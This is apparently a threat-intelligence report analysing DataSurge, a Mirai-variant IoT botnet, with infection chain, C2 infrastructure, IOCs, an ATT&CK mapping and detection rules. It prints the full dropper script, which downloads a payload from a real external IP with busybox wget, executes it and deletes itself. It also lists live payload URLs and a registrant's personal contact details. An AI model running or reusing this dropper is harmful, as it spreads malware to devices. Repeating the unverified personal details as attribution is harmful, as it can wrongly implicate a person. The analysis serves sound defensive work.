highIoT

DataSurge Botnet — Mirai Variant IoT Dropper with DNS-Based Dynamic C2

PublishedMarch 13, 2026

Threat Actors:using a common configuration or toolkit.s).and Threat Actor Assessments seeking jurisdictional protection.

iot-vulnc2botnetbrute-forceexploitiot

Executive Summary

The DataSurge Botnet is an active Mirai-variant IoT botnet campaign discovered in March 2026 targeting embedded Linux devices across 10+ CPU architectures. The operation deploys a multi-stage infection chain: a POSIX shell dropper (bbc) selects and fetches a matching architecture-specific ELF payload from a dedicated distribution server (5.175.223.124), which then beacons to a dedicated C2 IP (130.12.180.151) discovered via a DNS TXT record published by the domain datasurge-bot.com. This DNS-based dynamic configuration mechanism is a deliberate OPSEC improvement over hardcoded C2 addresses seen in earlier Mirai forks.

The actor operates a commercial Botnet-as-a-Service (BaaS) infrastructure under the datasurge.vip brand, including a web reporting panel (report.datasurge.vip) and a payment interface (pay.datasurge.vip), indicating this is a for-hire DDoS capability. The C2 infrastructure is intentionally split across two hosting providers (GhostNet/NextSolutions in the Netherlands for payload hosting; Netiface LLC / Omegatech in the US for the actual C2) to complicate takedown. Both servers expose anonymous FTP with a distinctive custom banner (220 Features: a .).

At time of writing, the campaign accounts for at least 139 unique malware samples linked to datasurge-bot.com, with samples dating to early February 2026. The botnet poses a risk to consumer routers, IP cameras, DVRs, and other IoT devices reachable via Telnet/SSH with weak or default credentials.

Sample Metadata

Field	Value
SHA256	`c308e27636663b280698ddb93f7b1b513159df2058a4a37dc3a371c70f7d9120`
SHA1	`016dbb6e84bd4bf4ea65b32dfa329e6d54c99ed3`
MD5	`9d7d0f73eb7ef174dc379655a52f8441`
File Name	`bbc` (also observed as `bbc.sh`, `jaws.sh`)
File Type	POSIX shell script, ASCII text
File Size	508 bytes
First Seen	2026-03-12 20:37:26 UTC (abuse.ch)
VT Detections	12/76
VT Threat Label	`downloader.miraidlod/possible`
VT Tags	`shell`, `sets-process-name`, `detect-debug-environment`, `self-delete`, `service-scan`
Compiler	N/A (shell script)

Stage 2 Binary Metadata (x86_64)

Field	Value
SHA256	`f02a038797f449d63d32d2eae14ddab662c6f14e9e279ef1eaa01a400fdbefb0`
File Name	`data.x86_64`
File Type	ELF 64-bit LSB executable, x86-64, statically linked, stripped
File Size	898,760 bytes
VT Detections	6/76
VT Threat Label	`trojan.mirai`
Compiler	GCC 12.3.0 (Buildroot 2021.11-11272-ge2962af)

Static Analysis — Stage 1: Shell Dropper (`bbc`)

Full Source

#!/bin/sh

ARCH=$(uname -m)
case "$ARCH" in
    armv4*) BIN="data.arm4" ;;
    armv5*) BIN="data.arm5" ;;
    armv6*) BIN="data.arm6" ;;
    armv7*) BIN="data.arm7" ;;
    mips*) BIN="data.mips-uclibc" ;;
    mipsel*) BIN="data.mipsel-uclibc" ;;
    aarch64) BIN="data.aarch64" ;;
    powerpc*) BIN="data.powerpc" ;;
    i*86) BIN="data.x86" ;;
    x86_64) BIN="data.x86_64" ;;
    *) BIN="data.arm7" ;;
esac
cd /tmp
rm $BIN
busybox wget http://5.175.223.124/$BIN
chmod 777 $BIN
./$BIN
rm $BIN
rm $0

Analysis

The dropper is a minimal 508-byte shell script with no obfuscation. Operational behaviors:

Architecture detection: Calls uname -m to identify the CPU type and selects the corresponding binary filename.
Target directory: Changes to /tmp — a universally writable path available on minimal embedded Linux systems where /tmp is typically a tmpfs mount.
Pre-execution cleanup: Deletes any pre-existing binary with the target filename before downloading, avoiding stale files.
Download via busybox wget: Uses busybox wget rather than standard wget or curl, confirming the target environment is an IoT/embedded device where BusyBox is the primary userland toolset.
Permission escalation: chmod 777 to make the binary executable (addresses scenarios where the filesystem is mounted with restrictive defaults).
Execution and cleanup: Runs the payload, then deletes both the binary and the dropper script (rm $0), leaving no artifacts.

Supported architectures: arm4, arm5, arm6, arm7, mips-uclibc, mipsel-uclibc, aarch64, powerpc, x86, x86_64. Default fallback is arm7, reflecting the target demographic (ARM-based home routers, cameras, NAS devices).

Static Analysis — Stage 2: Mirai ELF Payload

Architecture Support

Binaries were retrieved live from the distribution server for all 10 variants:

Filename	Architecture	Size	SHA256 (partial)
`data.x86_64`	x86-64 ELF64, statically linked, stripped	898 KB	`f02a038797...`
`data.x86`	i386 ELF32, statically linked, stripped	931 KB	`5d84a43059...`
`data.arm7`	ARM EABI4 ELF32, statically linked, stripped	138 KB	`6dfa1e31b2...`
`data.mips-uclibc`	MIPS MSB ELF32, statically linked, stripped	201 KB	`fdea4b7688...`

All binaries compiled with GCC 12.3.0 (Buildroot 2021.11-11272-ge2962af), indicating a purpose-built cross-compilation toolchain for IoT botnet payload production.

Key Extracted Strings

String	Significance
`y_BackwaH3N`	Process rename target — bot hides under this name after execution
`\.uhavenobotsxd`	Blacklisted string pattern (prevents re-infection of already-infected devices)
`bbc.sh`	References to the dropper script name
`12x\.sh`	References to another campaign dropper variant
`/dev/shm`	Secondary execution path — memory-resident execution to evade disk forensics
`/login`, `/api/users`	Web panel API endpoints for the operator's C2 dashboard
`com.qihoo.daemon`	Qihoo 360 AV process name — bot terminates Chinese AV if found
`[DEBUG_MODE_ATTACK] attack_parse:...`	Debug-mode attack command parsing strings
`[DEBUG_MODE_ATTACK] attack_start:...`	Debug-mode attack execution strings
`Blacklisted backdoor`, `Blacklisted pattern`	Conflict avoidance — bot checks for competing malware
`flood`	DDoS flood attack capability
`datasurge-bot.com`	C2 domain queried for DNS TXT-based configuration

Dynamic C2 Resolution (DNS TXT Method)

The binary queries datasurge-bot.com for a TXT record to dynamically retrieve the C2 server address. This is a OPSEC improvement over hardcoded IPs, as the operator can migrate C2 infrastructure by simply updating the DNS record.

The DNS TXT record in the wild (base64-wrapped):

XHgwNFx4MDVceDFFXHgwMVx4MDNceDAxXHgxRVx4MDZceDA1XHgxRVx4MDdceDA0

Decoded content (12 bytes):

04 05 1E 01 03 01 1E 06 05 1E 07 04

This is an operator-defined encoding of the C2 connection configuration. Sandbox analysis confirms datasurge-bot.com resolved to 130.12.180.151 (the confirmed C2 server). The 0x1E byte pattern likely serves as a structural delimiter.

Attack Capabilities (Inferred from Strings)

The debug strings confirm a full Mirai-derived attack framework:

Multi-target DDoS: attack_parse: target count=%u
Duration control: attack_parse: duration=%u seconds
Multiple attack vectors: attack_parse: vector=%u
Attack process forking: attack_start: forked attack process pid=%d
Slot-based concurrency management: attack_start: no free slots available

Standard Mirai DDoS vectors include: UDP flood, TCP SYN flood, HTTP GET flood, DNS amplification, GRE flood.

Full Infection Chain

[Vulnerable IoT Device]
        |
        | (Telnet/SSH brute force with default creds)
        |
[Loader / Existing Bot drops dropper script]
        |
        v
[bbc.sh / jaws.sh Dropper executes]
   1. uname -m → detect architecture
   2. cd /tmp
   3. busybox wget http://5.175.223.124/data.$ARCH
   4. chmod 777 data.$ARCH
   5. ./data.$ARCH
   6. rm data.$ARCH && rm $0
        |
        v
[Stage 2 ELF Mirai Bot executes]
   1. Rename process to "y_BackwaH3N"
   2. Fork and daemonize
   3. Query datasurge-bot.com TXT record
      → resolves to 130.12.180.151
   4. Connect to C2: 130.12.180.151:25565
   5. Receive attack commands
   6. Kill competing malware (Blacklisted patterns)
   7. Kill Qihoo 360 AV (com.qihoo.daemon)
   8. Scan for new vulnerable targets (telnet/ssh)
   9. Execute DDoS floods on operator command

Network Indicators and Infrastructure

Indicator Table

Type	Value	Role	Notes
IP	`5.175.223.124`	Payload distribution server	AS204464 GhostNet/NextSolutions, NL
IP	`130.12.180.151`	C2 server	AS202412 Omegatech/Netiface LLC, US
Domain	`datasurge-bot.com`	C2 config domain (DNS TXT)	Registered 2026-02-03 via IONOS
Domain	`datasurge.vip`	Operator web infrastructure	Registered 2025-08-08 via Namecheap
URL	`http://5.175.223.124/data.x86_64`	Stage 2 payload download	Confirmed by ET IDS alert
URL	`http://5.175.223.124/data.x86`	Stage 2 payload download
URL	`http://5.175.223.124/data.arm7`	Stage 2 payload download
URL	`http://5.175.223.124/data.mips-uclibc`	Stage 2 payload download
URL	`http://5.175.223.124/data.arm4`	Stage 2 payload download (inferred)
URL	`http://5.175.223.124/data.arm5`	Stage 2 payload download (inferred)
URL	`http://5.175.223.124/data.arm6`	Stage 2 payload download (inferred)
URL	`http://5.175.223.124/data.aarch64`	Stage 2 payload download (inferred)
URL	`http://5.175.223.124/data.powerpc`	Stage 2 payload download (inferred)
URL	`http://5.175.223.124/data.mipsel-uclibc`	Stage 2 payload download (inferred)
Subdomain	`report.datasurge.vip`	Operator C2 web panel	Origin at 5.175.223.124 (CF 522)
Subdomain	`pay.datasurge.vip`	Payment portal (BaaS)	crt.sh cert confirmed

Download Server: 5.175.223.124

Attribute	Value
ASN	AS204464
AS Name	GhostNet (Justin Franke)
Organization	NextSolutions Einzelunternehmen
Legal Name	Justin Franke
Address	c/o MDC Management#4627, Welserstrasse 3, 87463 Dietmannsried, DE
Phone	+491636914800
Country	NL (network) / DE (registrant)
RIPE Org Created	2026-01-09
Route Created	2026-01-22
Abuse Email	abuse@ghostnet.de
Open Ports	21/tcp (FTP), 22/tcp (SSH OpenSSH 9.6p1), 80/tcp (HTTP), 8080/tcp (HTTP)
FTP	Anonymous FTP enabled; banner: `220 Features: a .`
VT Detections	11/94 malicious
HTTP Response	Cloudflare 522 for `report.datasurge.vip` on port 80 (leaks origin domain)

OPSEC Failure: The HTTP server on port 80 is configured as the origin for report.datasurge.vip but Cloudflare returns a 522 error, leaking the relationship between the download server and the operator's web panel domain.

C2 Server: 130.12.180.151

Attribute	Value
ASN	AS202412
AS Name	Omegatech LTD
Organization	Netiface LLC
Address	6844 Bardstown Rd, Louisville, KY 40291, US
ARIN Net Registered	2025-10-08
Open Ports	21/tcp (FTP anon), 22/tcp (SSH OpenSSH 8.9p1 Ubuntu), 111/tcp (rpcbind), 25565/tcp
FTP	Anonymous FTP enabled; banner: `220 Features: a .` (same as download server)
Shodan Tags	`scanner` — actively scanning internet
VT Detections	20/94 malicious
DNS Hostname	`datasurge-bot.com`
DNS Resolved	2026-02-14 (UNIX: 1771045368)

Port 25565: Typically the Minecraft game server port, repurposed here as the Mirai C2 listener port. This is a common evasion technique to blend in with legitimate game server traffic.

Identical FTP Banner: Both 5.175.223.124 and 130.12.180.151 expose an FTP server with the banner 220 Features: a .. This shared banner strongly suggests both servers are operated by the same actor using a common configuration or toolkit.

Campaign Context

VT pivot on datasurge-bot.com yields 139 unique malware samples communicating with this domain, all classified as trojan.mirai or downloader.miraidlod. A representative selection:

SHA256 (partial)	Name	Detections	Label
`07334a75d54d824b...`	`396490758`	22/76	trojan.mirai
`1218e6668ff21f5d...`	`.elf`	32/76	trojan.mirai/r002c0xb726
`1f8080e52d6a3a5e...`	`data.arm5`	35/76	trojan.mirai/r002c0dbl26
`1fefa1a8d9e60cd6...`	`data.arm7`	28/76	trojan.mirai/sjwoa
`1ffacb6cb04640a6...`	`data.x86_64`	26/76	trojan.mirai
`336687311750c9c8...`	`f21ci5j.exe`	23/76	trojan.mirai
`3ca9cd2138e64d0b...`	`wwmv7l.exe`	24/76	trojan.mirai/r002c0dbp26
`42726566bbedec0b...`	`jtmz4nk.exe`	28/76	trojan.mirai/usblb626
`55476379e665d75a...`	`wget_data.aarch64`	34/76	trojan.mirai/phzka
`c308e27636663b28...`	`bbc` (this sample)	12/76	downloader.miraidlod/possible

Notable finding: The campaign includes .exe files (Windows PE), suggesting the operator is also targeting Windows systems with a Mirai-derived loader. This is consistent with newer Mirai forks (e.g., Mirai v4, ZeroBot, or custom forks) that have added Windows infection capability.

Campaign Timeline

Date	Event
2025-08-08	`datasurge.vip` registered via Namecheap
2026-01-09	AS204464/NextSolutions RIPE org created
2026-01-22	Route 5.175.223.0/24 created in RIPE
2026-02-03	`datasurge-bot.com` registered via IONOS; TLS certificates issued (Google Trust + Let's Encrypt)
2026-02-14	`datasurge-bot.com` DNS resolves to 130.12.180.151 (first sandbox observation)
2026-03-09	`report.datasurge.vip` origin server last modified (Last-Modified: Mon, 09 Mar 2026 20:44:29 GMT)
2026-03-12	`bbc` dropper submitted to abuse.ch (this sample)
2026-03-13	Active — binaries still serving from 5.175.223.124

Dropper Script Naming

Multiple dropper filenames observed across related samples: bbc, bbc.sh, jaws.sh, 12x.sh. The numeric names like 396490758, 399305898 appear to be bot/campaign tracking IDs generated by the operator's infrastructure.

Behavioral Analysis (Inferred)

Post-Compromise Actions

Process rename: The bot renames itself to y_BackwaH3N using prctl(PR_SET_NAME) — a standard Mirai technique to hide from ps output inspection.
Anti-forensics: Files are deleted from /tmp after execution. The bot may also attempt execution from /dev/shm for fully memory-resident operation.
Competition elimination: The bot checks for and kills processes matching blacklisted patterns (Blacklisted backdoor, Blacklisted pattern), including Qihoo 360 AV (com.qihoo.daemon). Also observed: pkill -9 nc (kills netcat backdoors left by other actors).
Scanner behavior: Shodan tags 130.12.180.151 as a "scanner" — the C2 server itself participates in propagation scanning, typical of Mirai's distributed scanning model where each bot scans random IP space for Telnet/SSH.
C2 protocol: Likely uses a modified binary protocol derived from Mirai's original TCP-based CNC protocol over port 25565.
DDoS execution: On receiving attack commands, the bot forks child processes to execute flood attacks against specified targets for a defined duration.

MITRE ATT&CK TTP Mapping

Technique ID	Technique	Description
T1595.001	Active Scanning: Scanning IP Blocks	C2 server (130.12.180.151) tagged as active scanner
T1190	Exploit Public-Facing Application	Initial access via Telnet/SSH brute force on IoT devices
T1078.001	Default Accounts	Use of default IoT device credentials for initial access
T1059.004	Command and Scripting Interpreter: Unix Shell	Shell script dropper (`bbc`) executes the infection chain
T1105	Ingress Tool Transfer	`busybox wget` downloads stage 2 payload from distribution server
T1036.005	Masquerading: Match Legitimate Name or Location	Process renamed to `y_BackwaH3N`; payload stored in `/tmp`
T1070.004	Indicator Removal: File Deletion	Dropper deletes payload and self (`rm $BIN && rm $0`)
T1496	Resource Hijacking	DDoS capability rents infected bots to third parties
T1071.004	Application Layer Protocol: DNS	DNS TXT record used to deliver dynamic C2 IP configuration
T1568.001	Dynamic Resolution: Fast Flux DNS	DNS TXT record allows operator to change C2 IP without recompiling
T1027	Obfuscated Files or Information	C2 address encoded in DNS TXT record (not hardcoded)
T1562.001	Impair Defenses: Disable or Modify Tools	Kills Qihoo 360 AV process (`com.qihoo.daemon`)
T1489	Service Stop	Kills competing malware and backdoor processes
T1498	Network Denial of Service	Core botnet DDoS capability — UDP flood, TCP SYN flood, etc.
T1583.001	Acquire Infrastructure: Domains	`datasurge.vip`, `datasurge-bot.com` registered for C2
T1584.004	Compromise Infrastructure: Server	VPS acquired from GhostNet (NL) and Omegatech (US)
T1608.001	Stage Capabilities: Upload Malware	Multi-arch payloads staged on distribution server

IOC Reference

Hashes

Type	Hash	Description
SHA256	`c308e27636663b280698ddb93f7b1b513159df2058a4a37dc3a371c70f7d9120`	Stage 1 dropper `bbc`
MD5	`9d7d0f73eb7ef174dc379655a52f8441`	Stage 1 dropper
SHA1	`016dbb6e84bd4bf4ea65b32dfa329e6d54c99ed3`	Stage 1 dropper
SHA256	`f02a038797f449d63d32d2eae14ddab662c6f14e9e279ef1eaa01a400fdbefb0`	Stage 2 `data.x86_64`
SHA256	`5d84a43059e40879ce7dfa16f3c0d0607904aa1ab7434f0dfb5228289f55ddff`	Stage 2 `data.x86`
SHA256	`6dfa1e31b246ddcc95bd98c8267e2742ec72eb42193b7bcf06a7326df74e2ae8`	Stage 2 `data.arm7`
SHA256	`fdea4b7688114a4edf26deb83a1a24bdd5d3edb3755d28da514f2ff7a7423a66`	Stage 2 `data.mips-uclibc`

Network IOCs

Type	Value	Notes
IPv4	`5.175.223.124`	Payload distribution server
IPv4	`130.12.180.151`	C2 server
Domain	`datasurge-bot.com`	C2 configuration domain (DNS TXT)
Domain	`datasurge.vip`	Operator branding domain
CIDR	`5.175.223.0/24`	AS204464 GhostNet/NextSolutions
CIDR	`130.12.180.0/22`	AS202412 Omegatech/Netiface LLC
URL	`http://5.175.223.124/data.x86_64`	Payload download
URL	`http://5.175.223.124/data.x86`	Payload download
URL	`http://5.175.223.124/data.arm7`	Payload download
URL	`http://5.175.223.124/data.mips-uclibc`	Payload download
URL	`http://5.175.223.124/data.arm5`	Payload download
URL	`http://5.175.223.124/data.aarch64`	Payload download
URL	`http://5.175.223.124/data.powerpc`	Payload download
Port	`25565/tcp` on `130.12.180.151`	Suspected Mirai C2 listener

String / Behavioral IOCs

Type	Value	Notes
Process name	`y_BackwaH3N`	Bot process rename
Mutex/marker	`\.uhavenobotsxd`	Anti-reinfection marker
Script name	`bbc.sh`, `jaws.sh`, `12x.sh`	Dropper filenames
DNS query	`datasurge-bot.com TXT`	C2 config lookup
FTP banner	`220 Features: a .`	Shared across both servers

Attribution and Threat Actor Assessment

Confidence Level: MODERATE

Indicators

The operator maintains a branded "DataSurge" infrastructure including a web panel (report.datasurge.vip), payment portal (pay.datasurge.vip), and bot management domain (datasurge-bot.com), strongly indicating a commercial DDoS-for-hire (booter/stresser) operation or Botnet-as-a-Service (BaaS) offering.
The infrastructure was bootstrapped in late 2025 / early 2026:
- datasurge.vip registered August 2025
- New ASN (AS204464) registered January 2026
- datasurge-bot.com registered February 2026
OPSEC Mistakes:
1. The HTTP server on 5.175.223.124 leaks the Cloudflare-proxied domain report.datasurge.vip in its 522 error response, linking the file distribution IP to the operator's web panel.
2. The FTP server on both C2 and distribution IPs shares an identical distinctive banner (220 Features: a .), linking the two servers.
3. The RIPE WHOIS for AS204464 contains an individual's full name (Justin Franke), phone number (+491636914800), and physical address (Welserstrasse 3, 87463 Dietmannsried, DE). This may be a genuine identity, a fraudulent registration, or a re-sold VPS attribution. The phone and address should be treated as potentially unverified.
The actor appears to be a relatively new entrant to the botnet-as-a-service market, based on the recent infrastructure registration dates and the moderate campaign size (139 samples over ~6 weeks).
Geolocation is inconclusive: download infrastructure is in NL, C2 is in US, registration details point to DE. Use of bulletproof/permissive hosters (GhostNet, Netiface/Omegatech) is consistent with criminal actors seeking jurisdictional protection.

Infrastructure Map

          ┌─────────────────────────────────────────────────────┐
          │              CLOUDFLARE (AS13335)                   │
          │   104.21.18.175 / 172.67.182.208                    │
          │   datasurge.vip (CDN/WAF proxy)                     │
          │   report.datasurge.vip → origin: 5.175.223.124      │
          │   pay.datasurge.vip                                  │
          └─────────────────────────────────────────────────────┘
                              │
                              │ (reverse proxy)
                              ▼
┌─────────────────────────────────┐       ┌──────────────────────────────────┐
│   DISTRIBUTION SERVER           │       │   C2 / BOT SERVER                │
│   5.175.223.124                 │       │   130.12.180.151                 │
│   AS204464 GhostNet/NextSol NL  │       │   AS202412 Omegatech US          │
│                                 │       │                                  │
│   Ports: 21(FTP), 22(SSH)       │       │   Ports: 21(FTP), 22(SSH)       │
│          80(HTTP), 8080(HTTP)   │       │          111(rpc), 25565(C2)     │
│                                 │       │                                  │
│   Files: data.arm4/5/6/7        │       │   ← datasurge-bot.com DNS TXT    │
│          data.mips-uclibc       │       │   Shodan: tagged "scanner"       │
│          data.mipsel-uclibc     │       │   Anonymous FTP enabled          │
│          data.aarch64           │       └──────────────────────────────────┘
│          data.powerpc                             ▲
│          data.x86 / data.x86_64 │                │ DNS TXT lookup
└─────────────────────────────────┘                │
              ▲                     ┌───────────────────────────────┐
              │ wget download       │   datasurge-bot.com           │
              │                    │   Registered: 2026-02-03 IONOS │
┌─────────────────────────────┐    │   NS: Cloudflare              │
│   bbc / bbc.sh dropper      │    │   TXT: encoded C2 config      │
│   (Stage 1 – 508 bytes)     │────│   Resolves to: 130.12.180.151 │
│   busybox wget payload      │    └───────────────────────────────┘
│   then executes + self-del  │
└─────────────────────────────┘
              │
              │ (deployed via Telnet/SSH brute force)
              ▼
┌─────────────────────────────┐
│   INFECTED IoT DEVICE       │
│   Routers, cameras, DVRs    │
│   /tmp/data.$ARCH           │
│   Process: y_BackwaH3N      │
│   Scans for more victims    │
└─────────────────────────────┘

Detection Recommendations

Network Detection

Block C2 IP: 130.12.180.151 — active C2 server
Block download server: 5.175.223.124 — payload distribution
Block domains: datasurge-bot.com, datasurge.vip (resolve to block at DNS level)
Alert on DNS TXT queries to datasurge-bot.com — any device making this query is infected
Alert on HTTP GET to IP addresses matching pattern /data\.(arm|mips|x86|aarch64|powerpc)[a-z_0-9-]*$ — dropper download signature
Alert on ELF downloads over HTTP from non-CDN IPs on port 80

Host-Based Detection

Process name y_BackwaH3N — if this process is running, the device is compromised
Files: /tmp/data.arm*, /tmp/data.x86*, /tmp/data.mips*, /tmp/data.aarch64, /tmp/data.powerpc
Dropper names: bbc.sh, jaws.sh, 12x.sh in /tmp
busybox wget spawning from unexpected parent processes

Report generated: 2026-03-13 | Analyst: GHOST / Breakglass Intelligence